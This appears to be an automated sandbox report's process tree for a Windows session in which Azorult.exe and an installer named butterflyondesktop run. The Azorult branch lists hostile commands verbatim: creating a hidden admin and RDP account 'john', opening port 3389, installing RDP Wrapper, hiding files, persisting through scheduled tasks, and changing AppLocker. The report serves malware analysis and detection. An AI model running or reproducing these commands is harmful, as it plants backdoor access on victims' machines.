    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7340,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6764 /prefetch:14
    3⤵
    PID:3696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7776,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:14
    3⤵
    PID:2096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=6492,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:1
    3⤵
    PID:4444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=6696,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:1
    3⤵
    PID:4040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=7240,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:1
    3⤵
    PID:3532
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=7236,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:1
    3⤵
    PID:3228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=8048,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1
    3⤵
    PID:2740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=3720,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
    3⤵
    PID:4568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8288,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8332 /prefetch:14
    3⤵
    PID:2420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=6528,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:1
    3⤵
    PID:4448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8660,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8604 /prefetch:14
    3⤵
    PID:4820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=8616,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:1
    3⤵
    PID:4276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7372,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7424 /prefetch:14
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    PID:1256
- - C:\Users\Admin\Downloads\butterflyondesktop.exe
    "C:\Users\Admin\Downloads\butterflyondesktop.exe"
    3⤵
    - Executes dropped EXE
    PID:1144
  - - C:\Users\Admin\AppData\Local\Temp\is-Q6LLS.tmp\butterflyondesktop.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-Q6LLS.tmp\butterflyondesktop.tmp" /SL5="$80300,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:4168
    - - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
        
        "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:1244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
        5⤵
        
        PID:5468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
        6⤵
        
        PID:232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9164,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9172 /prefetch:14
    3⤵
    PID:684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=8388,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9168 /prefetch:1
    3⤵
    PID:4272
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6116,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8520 /prefetch:14
    3⤵
    PID:4892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=5024,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9172 /prefetch:1
    3⤵
    PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=5164,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6844 /prefetch:1
    3⤵
    PID:1536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=4896,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8332 /prefetch:1
    3⤵
    PID:2792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=8896,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8104 /prefetch:1
    3⤵
    PID:1920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9548,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=8728 /prefetch:14
    3⤵
    PID:4776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=1940 /prefetch:14
    3⤵
    PID:4272
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=9640,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9608 /prefetch:1
    3⤵
    PID:4184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9616,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9628 /prefetch:14
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    PID:4100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=8064,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9436 /prefetch:1
    3⤵
    PID:2216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8124,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9532 /prefetch:14
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    PID:1528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7960,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=9056 /prefetch:14
    3⤵
    PID:2600
- - C:\Users\Admin\Downloads\Azorult.exe
    "C:\Users\Admin\Downloads\Azorult.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - UAC bypass
    - Blocks application from running via registry modification
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Modifies WinLogon
    - Hide Artifacts: Hidden Users
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    PID:2292
  - - C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4092
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        5⤵
        
        PID:3952
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5804
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        7⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:3336
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:1028
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:3464
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4028
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5216
        
        C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2808
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        7⤵
        Views/modifies file attributes
        
        PID:4360
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        7⤵
        Views/modifies file attributes
        
        PID:5800
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5052
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        7⤵
        Launches sc.exe
        
        PID:5568
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        7⤵
        Launches sc.exe
        
        PID:3312
    - - C:\ProgramData\Windows\winit.exe
        
        "C:\ProgramData\Windows\winit.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3808
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        6⤵
        
        PID:5620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        7⤵
        Delays execution with timeout.exe
        
        PID:5540
  - - C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4856
    - - C:\ProgramData\Microsoft\Intel\taskhost.exe
        
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2316
      - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5144
      - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        6⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:1144
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        7⤵
        
        PID:3096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4352
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:1256
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:3528
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2228
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5436
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        9⤵
        Delays execution with timeout.exe
        
        PID:3880
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        9⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        10⤵
        
        PID:2608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        11⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        11⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        11⤵
        Modifies Windows Firewall
        
        PID:2408
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        11⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        12⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        11⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        11⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        12⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        12⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        11⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        12⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        11⤵
        
        PID:724
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        12⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        12⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        12⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1212
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        12⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:5760
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:5992
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        12⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        12⤵
        
        PID:996
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        11⤵
        
        PID:4724
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        12⤵
        Modifies Windows Firewall
        
        PID:5464
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        11⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        11⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        11⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        12⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4164
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4812
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4636
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        9⤵
        Delays execution with timeout.exe
        
        PID:5200
      - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        6⤵
        Executes dropped EXE
        
        PID:1312
        
        C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7443.tmp\7444.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        8⤵
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5464
      - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        6⤵
        
        PID:3336
        
        C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        7⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        8⤵
        
        PID:4132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        9⤵
        
        PID:5804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        7⤵
        
        PID:4232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3528
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        8⤵
        Gathers network information
        
        PID:4076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        7⤵
        
        PID:2408
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        8⤵
        
        PID:2808
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4856
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4660
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        6⤵
        
        PID:6124
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        6⤵
        
        PID:2540
        
